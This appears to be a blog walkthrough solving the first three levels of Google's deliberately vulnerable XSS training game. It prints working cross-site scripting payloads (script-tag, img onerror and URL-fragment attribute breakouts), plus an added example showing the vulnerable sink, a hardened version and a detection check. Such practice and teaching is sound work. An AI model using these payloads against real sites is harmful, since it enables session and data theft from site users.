As Google says, "Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps..."

So they have decided to help us learn how to exploit this kind of vulnerability by creating a deliberately vulnerable website at:

https://xss-game.appspot.com/

There are 6 exercises to solve. Before starting to solve them... Why should I know how to exploit an XSS vulnerability?

  1. To be more qualified in the security field.
  2. To make money. Currently, Google is paying up to $7,500 for dangerous XSS bugs discovered in their most sensitive products.

But Google is not the only one paying a bounty for disclosed vulnerabilities. Others like Yahoo, Facebook or PayPal have the same reward policy for discovered bugs.

In this post, we are going to solve the first 3 exercises proposed by Google. In the next post, we will solve the remaining ones.

Exercise 1

This is the easiest exercise: our input is included directly in the page without any escaping.

Inserting the code below is enough to trigger the alert.

<script>alert('BehindTheFirewalls')</script>

Exercise 2

This exercise is an example of how to perform a persistent or stored Cross-Site Scripting attack in a simple way.

<img src=x onerror=alert('BehindTheFirewalls')>

Exercise 3

This exercise is a little more complex because there is no input field in which to try the XSS.

But what happens if we rewrite the URI? If we replace "#1" with "#11111"...

... we will see that "1111" has been added to the source code.

So, if we add #11111'onerror=alert('BehindTheFirewalls')> to the end of the URL, the generated code will be:

<img src='/static/level3/cloud#11111'onerror=alert('BehindTheFirewalls')>'.jpg' />

And the alert will appear.
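The root cause in Exercise 3 is that a value taken from the URL fragment is concatenated straight into an HTML attribute, so a single quote closes the attribute and whatever follows is parsed as markup. The following is an added example, not the game's own source: it models that concatenation pattern (an assumption about how the page is built), puts the validated version beside it, and includes a small check a reviewer could run over generated markup to spot an attribute breakout.

```javascript
// Added example: models the Exercise 3 sink described in the post.
// The path prefix and the image-index range are assumptions.

// Vulnerable pattern: the fragment text is trusted and spliced into
// a quoted attribute, so a quote in the value ends the attribute early.
function buildImgUnsafe(fragment) {
  const num = fragment.replace(/^#/, "");
  return "<img src='/static/level3/cloud" + num + ".jpg' />";
}

// Hardened version: only an expected image index (assumed 1..3) is
// accepted; anything else is rejected before it reaches the markup.
function buildImgSafe(fragment) {
  const num = fragment.replace(/^#/, "");
  if (!/^[1-3]$/.test(num)) {
    return null; // not a valid index, build nothing
  }
  return "<img src='/static/level3/cloud" + num + ".jpg' />";
}

// Heuristic review check: does a quote in the markup get followed by
// an on* event handler, i.e. did a value escape its attribute?
function containsAttributeBreakout(html) {
  return /'\s*on\w+\s*=/i.test(html);
}

// Constructed sample input: the post's own Exercise 3 fragment.
const constructedPayload = "#11111'onerror=alert('BehindTheFirewalls')>";

console.log(containsAttributeBreakout(buildImgUnsafe(constructedPayload))); // true
console.log(buildImgSafe(constructedPayload)); // null
console.log(buildImgSafe("#2")); // <img src='/static/level3/cloud2.jpg' />
```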

These are the three possible options to exploit this vulnerability.

/frame#1'onerror=alert('BehindTheFirewalls')>

/frame#1.jpg'onload=alert('BehindTheFirewalls')>

/frame#1jpg'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>